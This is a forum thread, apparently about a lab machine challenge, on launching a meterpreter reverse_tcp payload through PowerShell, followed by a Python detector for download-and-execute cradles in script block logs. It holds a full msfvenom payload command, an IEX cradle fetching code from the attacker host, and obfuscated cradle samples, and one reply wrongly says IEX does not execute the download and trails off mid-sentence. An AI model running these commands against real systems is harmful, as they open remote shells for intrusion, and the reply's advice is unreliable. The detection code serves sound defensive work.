How to use meterpreter/reverse_tcp with PowerShell?

I’m new and having some issues using the meterpreter/reverse_tcp payload with PS.

Note: this may be kind of dumb since I already have shell access on the victim machine, but I still want to understand what I’m doing wrong.


I have shell/PS user-level access on a 64-bit Windows machine (one of the machine challenges). I want to start a meterpreter shell.

What I’m Doing

I generate a payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_from_tun0> LPORT=9001 VERBOSE=true -f ps1 -o meterpreter.ps1

I then execute it from the remote shell (running a local webserver to host):

powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')

However, nothing happens: I just get the shell prompt back on the victim machine and no activity on my msf handler. Watching for any connections to my host with nc -lvnp 9001 also doesn’t show any connection being made.

I verified the victim can ping the host, that the content is downloaded correctly, etc. My expectation is that when the msfvenom payload is executed, it will try to connect to the handler on the given host… Is there something I’m doing wrong or am I misunderstanding how to use msfvenom?

Use unicorn: GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and
It is specifically created for this purpose.

First you have to start a web server on your Kali with <python -m SimpleHTTPServer 80> in order to be able to download it through the shell you already have. The "powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')" command just downloads the file from the web server you host, it doesn't execute it. You will then have to execute the file after you download it with . Hope this helps.
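Seen from the defending side, the `IEX(New-Object Net.WebClient).downloadString(...)` line quoted in this thread is a pattern worth flagging in PowerShell script block logs. The following is an added example, not part of the original posts: the sample log text, the `classify` and `normalize` names and the verdict labels are constructed for illustration, and it assumes script block logging (event ID 4104) is the source of the text.

```python
import re

# Constructed ScriptBlockText samples, shaped like PowerShell script block
# logging output (event ID 4104). 192.0.2.10 is a documentation address.
SAMPLES = [
    "IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/meterpreter.ps1')",
    "i`e`x (New-Object  System.Net.WebClient).('Down'+'loadString').Invoke('http://192.0.2.10/a.ps1')",
    "Invoke-Expression (Get-Content .\\build.ps1 -Raw)",
    "(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/tool.zip', 'tool.zip')",
]

# PowerShell is case-insensitive, so every pattern is too.
EXEC = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)
FETCH = re.compile(r"net\.webclient\b.*?\bdownload(?:string|data)\b", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def normalize(text):
    """Undo cheap obfuscation so the patterns see canonical text."""
    text = text.replace("`", "")                    # backticks inside names
    text = re.sub(r"['\"]\s*\+\s*['\"]", "", text)  # 'Down'+'loadString'
    return re.sub(r"\s+", " ", text)                # collapse whitespace


def classify(script_block):
    """Return (verdict, urls) for one logged script block."""
    norm = normalize(script_block)
    fetches = bool(FETCH.search(norm))
    executes = bool(EXEC.search(norm))
    if fetches and executes:
        verdict = "remote-fetch-and-execute"   # in-memory cradle: alert
    elif executes:
        verdict = "dynamic-execute"            # IEX on local content: review
    else:
        verdict = "no-match"                   # e.g. DownloadFile to disk
    return verdict, URL.findall(norm)


if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample), "<-", sample)
```

The normalization only covers backtick insertion and adjacent string concatenation; encoded commands and variable indirection need the decoded script block that the logging itself records.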